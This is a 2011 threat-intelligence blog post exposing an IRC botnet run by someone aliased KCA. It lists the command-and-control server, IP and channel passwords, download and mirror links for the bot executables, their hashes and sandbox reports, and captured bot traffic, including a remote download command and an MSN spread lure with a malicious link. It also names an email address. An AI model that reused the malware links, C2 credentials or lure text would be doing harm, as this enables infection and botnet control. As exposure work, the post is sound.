Exposed Botnets: KCA's Botnet

Monday, September 12, 2011

KCA's Botnet

BoTNeTRooT@hotmail.com
Goes under the alias KCA
SohbetCeLL.Net

Server: tr.byinter.net (149.3.130.4)
Main Channel: #BoTiSTaN

Bots:
Unknown Irc Bots:
http://www.sohbetcell.net/KCA.exe
http://www.sohbetcell.net/bot.exe (Possibly TsGh Bot)
http://www.sohbetcell.net/images.exe

RageBot/Agobot:
http://www.sohbetcell.net/vnc.exe

DorkBot/NgrBot Varients:
http://www.sohbetcell.net/bg.exe
http://www.sohbetcell.net/enes.exe

Other bots used:
The irc also uses Aryan bot, I was unable to acquire an .exe at the time of this analysis.

Mirror (in case he removes the bots from his site):
http://www.mediafire.com/download.php?7tyho4d186y0y9s
http://www.multiupload.com/USXT6VA2XB

KCA.exe (IRC Bot)
http://www.virustotal.com/file-scan/repo...1315763939
http://www.threatexpert.com/report.aspx?...5e686ac6db
http://anubis.iseclab.org/?action=result...d14e07eca2
Md5: e4e34ef3c4609a89bfc0b95e686ac6db
DNS Queries: tr.byinter.net (149.3.130.4) (Was 178.162.244.239 when that analysis took place)
IRC Conversations:
Nick: KCA{AUT-XP}992432
Username: 9924
Server Pass: KCA
Joined Channel: #KCA with Password KCAt
Private Message to Channel #KCA: "www.metalteam.oRg"

bot.exe (IRC Bot) (Possibly variant of TsGh bot)
http://www.virustotal.com/file-scan/repo...1315765287
http://www.threatexpert.com/report.aspx?...979195befc
http://anubis.iseclab.org/?action=result...d056960105
Md5: 1978e6758d4ab41f392457979195befc
DNS Queries: tr.byinter.net (149.3.130.4)
IRC Conversations:
Nick: KCA[iRooT-XP-AUT]039489
Username: 6044
Joined Channel: #botnet with Password KCA
Private Message to Channel #botistan: "#dl http://www.sohbetcell.net/bg.exe 1"

images.exe (IRC Bot)
http://www.virustotal.com/file-scan/repo...1315764816
http://www.threatexpert.com/report.aspx?...fa65617b49
http://anubis.iseclab.org/?action=result...91fcc18a9d
Md5: 01985cc5f38d8a719da83efa65617b49
DNS Queries: tr.byinter.net (149.3.130.4) (Was 178.162.244.239 when that analysis took place)
IRC Conversations:
Nick: [9355|AUT|XP|KCA]
Username: 9355
Server Pass: KCA
Joined Channel: #KCA with Password KCA

vnc.exe (Rage Bot/Agobot)
http://www.virustotal.com/file-scan/repo...1315764819
http://www.threatexpert.com/report.aspx?...721c444cd3
http://anubis.iseclab.org/?action=result...f96c16f376
Md5: 23c849b73f74236f15159b721c444cd3
DNS Queries: tr.byinter.net (149.3.130.4)
IRC Conversations:
Nick: X{KCA|VNC}60389
Username: ummkj
Joined Channel: #vnc with Password KCA

bg.exe (Variant of Dorkbot/Ngrbot)
http://www.virustotal.com/file-scan/repo...1315764588
http://www.threatexpert.com/report.aspx?...08eb6ca464
http://anubis.iseclab.org/?action=result...b89bf83d87
Md5: ba93b01ff4a0e63f9b35d808eb6ca464
Irc Connection: 149.3.130.4:6667
IRC Conversations:
NICK n{US|XPa}brjxndz
USER brjxndz 0 0 :brjxndz
JOIN #BETA KCA
PRIVMSG #beta :[MSN]: Updated MSN spread message to "This is in the image that you? http://www.sohbetcell.net/images.php?id="

enes.exe (Variant of Dorkbot/Ngrbot)
http://www.virustotal.com/file-scan/repo...1315767195
http://www.threatexpert.com/report.aspx?...cb225a2b3b
http://anubis.iseclab.org/?action=result...f3794cdfa5
Md5: 95552ba9c7530c3cd25f7bcb225a2b3b

1 comment:

AnonymousAugust 2, 2012 at 7:34 AM
very good !
ReplyDelete
Replies

Subscribe to: Post Comments (Atom)